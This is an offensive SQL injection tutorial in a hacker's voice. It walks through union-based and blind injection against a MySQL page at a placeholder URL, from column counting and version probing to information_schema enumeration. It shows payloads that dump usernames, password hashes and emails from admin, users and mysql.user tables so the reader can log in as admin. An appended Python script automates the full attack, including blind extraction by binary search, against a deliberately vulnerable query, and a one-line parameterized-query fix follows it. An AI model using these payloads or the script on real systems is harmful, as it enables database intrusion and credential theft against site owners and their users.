If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use ..." or something similar, the parameter is vulnerable to SQL injection :)

(If the application hides database errors, the page may just break or load normally. That does not prove the parameter is safe; finding out without error messages is what the blind technique in part 2 is for.)

                                                Step 2

2). Find the number of columns

To find the number of columns we use ORDER BY (which tells the database how to order the result). We just keep incrementing the number until we get an error:

http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means the query has 3 columns, because we got an error on 4.

                                                Step 3

3). Check for UNION

With UNION we can select more data in one SQL statement. So we try:

http://www.site.com/news.php?id=5 union all select 1,2,3/*

(we already found in step 2 that the number of columns is 3). If we see some of the numbers on the screen, i.e. 1 or 2 or 3, then the UNION works :)

                                                Step 4

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/*

NOTE: if /* is not working or you get some error, then try -- instead. It's a comment and it's important for our query to work properly.

Let's say that we have number 2 on the screen. Now to check the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this:

http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." (I didn't see any paper covering this problem, so I must write it :)), what we need is the convert() function, i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or hex() and unhex(), i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version :D

                                                Step 5

5). Getting table and column names

If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we must guess table and column names in most cases (later I will describe MySQL 5 and above). Common table names are: user/s, admin/s, member/s ... Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e.

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good :D) We know that table admin exists... now to check column names:

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try another column name) We get a username displayed on screen; examples would be admin, superadmin etc... Now to check if the column password exists:

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try another column name) We see the password on the screen as a hash or plain-text, it depends on how the database is set up :) i.e. md5 hash, mysql hash, sha1...

Now we complete the query to look nice :) For that we can use the concat() function (it joins strings), i.e.

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a, the hex value for : (colon). There is another way for that, char(58), the ASCII value for : :

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash. When you have this, you can log in as admin or some superuser :D

If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so the example would be:

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

(Reading mysql.user only works if the application's database account has been granted access to the mysql database, which a least-privilege setup denies.)

                                                Step 6

6). MySQL 5

Like I said before, I'm going to explain how to get table and column names
in MySQL 5 and above.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is displayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get the column names of table users displayed. Just using LIMIT we can list all columns in table users.

Note that this won't work if magic quotes is ON, because the quotes around users get escaped. In that case write the string as a hex literal, which needs no quotes: where table_name=0x7573657273 (0x7573657273 is "users").

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat(), which I described earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part :)



2. Blind SQL Injection

Blind injection is a little more complicated than classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or other content is missing on the returned page then the site is vulnerable to blind SQL injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when a plain select cannot be used (nothing from our query is displayed on the page) we use a subselect inside the condition

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if the page loads normally we have access to mysql.user and then later we can pull some passwords using the load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our subquery returns only 1 row, which is very important: a subquery used in a comparison must not return more than one row, otherwise the query errors out.)

then if the page loads normally without content missing, the table users exists.
if you get FALSE (some article missing), just change the table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users and columns username and password, so we are going to pull characters from them.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns the first character, 1 character in length. ascii() converts that character into its ASCII value

and then we compare it using the greater-than symbol >.

so if the ASCII value is greater than 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that I changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length)

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105

FALSE!!!

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep going until you reach the end. (when >0 returns FALSE we know that we have reached the end, because ascii() of the empty string is 0.)
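As an added example (mine, not part of the tutorial), the whole procedure driven from Python against a deliberately vulnerable query. SQLite stands in for MySQL so it runs offline, which changes a few spellings: there is no information_schema, so sqlite_master is read instead; unicode()/substr() replace ascii()/substring(); || replaces concat(). count_columns() is step 2 (ORDER BY until an error), union_read() is steps 3 to 6 (UNION with the right column count, reading the displayed column), and extract() is the blind extraction of part 2. It goes beyond the tutorial in one way: instead of probing the ASCII value linearly with >, it binary-searches it, which takes about 7 requests per character. The table contents are constructed.

```python
import sqlite3

# --- the target: a "news.php?id=" handler that pastes the parameter into SQL -----
db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
    INSERT INTO news VALUES (5, 'Hello', 'First article');
    CREATE TABLE users(id INTEGER, username TEXT, password TEXT, email TEXT);
    INSERT INTO users VALUES (1, 'cipher', '5f4dcc3b5aa765d61d8327deb882cf99', 'cipher@example.com');
""")


def news_page(id_param):
    """Deliberately vulnerable: no parameterisation, no validation of id."""
    return db.execute("SELECT id, title, body FROM news WHERE id=" + id_param).fetchall()


# --- attacker side: only the page's behaviour (rows or error) is observable -------
def page_loads(payload):
    """Boolean oracle: does the article still render with the payload appended?"""
    try:
        return len(news_page("5 " + payload)) > 0
    except sqlite3.Error:
        return False


def page_errors(payload):
    """Error oracle for the ORDER BY trick (step 2 of the tutorial)."""
    try:
        news_page("5 " + payload)
        return False
    except sqlite3.Error:
        return True


def count_columns(max_cols=32):
    """ORDER BY n fails as soon as n exceeds the number of selected columns."""
    n = 1
    while n <= max_cols and not page_errors("ORDER BY %d -- " % n):
        n += 1
    return n - 1


def union_read(expr, from_clause, ncols):
    """Steps 3-6: UNION our SELECT onto the page query with the right number of
    columns, tag our rows with -1 in the first column and read the second one.
    SQLite has no information_schema; sqlite_master plays the same role."""
    cols = ["NULL"] * ncols
    cols[0], cols[1] = "-1", "(%s)" % expr
    rows = news_page("5 UNION ALL SELECT %s %s -- " % (",".join(cols), from_clause))
    return [row[1] for row in rows if row[0] == -1]


def extract(expr, max_len=64):
    """Blind extraction (part 2, step 4) of the string `expr` evaluates to.
    Binary search on the code point costs about 7 requests per character instead
    of the tutorial's linear '>' probing. SQLite: unicode()/substr() stand in for
    MySQL's ascii()/substring()."""
    out = ""
    for pos in range(1, max_len + 1):
        probe = "AND unicode(substr((%s),%d,1))>%%d -- " % (expr, pos)
        if not page_loads(probe % 0):       # empty substring gives no row: end of string
            break
        lo, hi = 0, 127                     # invariant: lo < code point <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if page_loads(probe % mid):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out


if __name__ == "__main__":
    ncols = count_columns()
    print("columns:", ncols)
    print("tables:", union_read("name", "FROM sqlite_master WHERE type='table'", ncols))
    print("union dump:", union_read("username||':'||password", "FROM users", ncols))
    print("blind dump:", extract("SELECT username||':'||password FROM users LIMIT 1"))
```

The fix on the application side is the one-line change the tutorial's vulnerability implies: db.execute("... WHERE id=?", (id_param,)) with the id bound as a parameter, after which every payload above is treated as data and none of the oracles returns anything useful.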

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:


To be continued and updated...